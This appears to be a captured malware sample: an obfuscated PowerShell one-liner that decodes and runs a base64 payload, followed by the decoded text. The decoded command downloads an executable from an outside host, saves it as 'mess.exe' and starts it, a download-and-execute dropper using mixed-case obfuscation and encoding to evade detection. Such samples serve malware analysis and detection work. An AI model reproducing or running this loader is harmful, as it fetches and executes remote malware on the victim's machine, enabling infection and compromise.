iex([System.TeXT.ENCoDinG]::Utf8.GETString([syStem.COnveRT]::fROmbAse64stRIng('CihOZXctT2JqZWN0IFN5U3RFbS5ORVQud0ViQ2xpRW5UKS5ET3dObE9hREZJTGUoJ2h0dHA6Ly9jYWpvcy5pbi8weC8xLmV4ZScsJ21lc3MuZXhlJyk7U3RhcnQtUHJvY2VzcyAnbWVzcy5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object SyStEm.NET.wEbCliEnT).DOwNlOaDFILe('http://cajos.in/0x/1.exe','mess.exe');Start-Process 'mess.exe'

